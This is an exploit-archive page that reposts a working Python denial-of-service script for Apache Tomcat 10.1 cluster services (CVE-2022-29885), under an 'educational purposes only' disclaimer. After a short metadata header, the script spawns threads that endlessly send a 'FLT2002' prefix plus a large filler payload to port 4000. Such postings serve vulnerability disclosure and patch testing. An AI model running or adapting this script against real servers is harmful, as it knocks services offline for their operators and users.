Apache tomcat 10.1 denial of service Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-05 | Type : dos | Platform : multiple
This exploit / vulnerability Apache tomcat 10.1 denial of service is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

# Exploit Title: Apache Tomcat 10.1 - Denial Of Service
# Google Dork: N/A
# Date: 13/07/2022
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://tomcat.apache.org/
# Software Link: https://tomcat.apache.org/download-10.cgi
# Version: <= 10.1
# Tested on: Apache Tomcat 10.0 (Docker)
# CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
# Exploit pre-requirements: pip install pwntools==4.8.0
# Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/





#!/usr/bin/env python3

# coding: utf-8

from pwn import *

import time

import threading

import subprocess

threads = []





def send_payload():

r = remote("localhost", 4000)

while True:

r.send(b"FLT2002" + b"A" * 10000)



for _ in range(5):

new_thread = threading.Thread(target=send_payload)

threads.append(new_thread)

new_thread.start()

for old_thread in threads:

old_thread.join()